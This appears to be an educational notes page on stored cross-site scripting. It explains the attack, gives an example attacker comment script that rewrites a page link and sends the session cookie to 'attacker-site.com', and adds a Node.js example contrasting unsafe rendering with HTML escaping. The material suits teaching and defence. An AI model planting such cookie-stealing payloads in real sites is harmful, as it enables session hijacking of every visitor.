
Stored XSS

links: WS TOC - Cross Site Scripting (XSS) - Index


  • The attacker submits a script as a regular post / comment
  • The post / comment is sent to the server and stored (for example in a database) without being encoded or filtered
  • Whenever any user later opens the post / comment, the server embeds the stored text in the page, the browser renders it, and the script executes in the origin of the vulnerable site; unlike reflected XSS, the victim does not have to click a crafted link, every visitor is affected
  • Can lead to modifications in the DOM (change links, add buttons)
  • Or, worse, sending personal information of users to the attacker (session cookies, page contents, form input); a cookie flagged HttpOnly is not readable from document.cookie, but the script can still act on the user's behalf from inside the page

Attacker Comment

<script>
// Change the first link on the page
var links = document.getElementsByTagName('a');
if (links.length > 0) {
    links[0].href = "http://malicious-site.com";
    links[0].textContent = 'Important Update';
}

// Send the current session ID to the attacker's server.
// match() returns null when there is no sessionid cookie (or it is
// HttpOnly and therefore invisible to script), so guard before indexing
var m = document.cookie.match(/sessionid=([^;]+)/);
var sessionId = m ? m[1] : null;
if (sessionId) {
    var attackerServer = 'http://attacker-site.com/';
    var img = new Image();
    // Setting src makes the browser issue a GET with the session ID in
    // the query string; the attacker only needs to log the request
    img.src = attackerServer +
        "collect?sessionid=" + sessionId;
    document.body.appendChild(img);
}
</script>
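The server side of the scenario above, as an added example that is not part of the original page: a minimal Node.js comment store that renders the stored comments first by raw concatenation (the stored XSS defect) and then with HTML output encoding (the fix). The in-memory store, the function names and the shortened attacker comment are constructed for this example; only the attacker URL is taken from the page.

```javascript
// Added example (not from the original page): a minimal comment system that
// shows the stored-XSS defect on the server side and the fix. Runs under Node.js.

// Constructed attacker comment, modelled on the one above.
const ATTACKER_COMMENT =
  '<script>new Image().src="http://attacker-site.com/collect?sessionid="' +
  '+document.cookie</script>';

// In-memory "database": the untrusted string is stored exactly as submitted.
// Storing it raw is not the bug; the bug is how it is later rendered.
const comments = [];
function postComment(text) {
  comments.push(text);
}

// VULNERABLE: the stored comment is concatenated straight into the page,
// so any HTML it contains becomes part of the DOM of every reader.
function renderPageUnsafe() {
  return comments.map(c => `<div class="comment">${c}</div>`).join('\n');
}

// Escaping for text placed between tags (HTML body context). Each character
// that can start or end markup or an attribute is replaced by its entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// FIXED: output-encode at render time. The comment is still stored raw
// (other consumers, e.g. a JSON API, need their own context-specific
// encoding), but what reaches the browser's HTML parser can only be text.
function renderPageSafe() {
  return comments.map(c => `<div class="comment">${escapeHtml(c)}</div>`).join('\n');
}

// Crude check a unit test or scanner could use on rendered output:
// does the page still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

postComment('Nice article!');
postComment(ATTACKER_COMMENT);
console.log('unsafe render contains script:', containsScriptTag(renderPageUnsafe()));
console.log('safe render contains script:  ', containsScriptTag(renderPageSafe()));
```

The escape function is only correct for the HTML body context shown here; a comment inserted into an attribute value, a URL, or a JavaScript string needs the encoding for that context, which is why templating engines with automatic contextual escaping are preferred over hand-rolled helpers.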
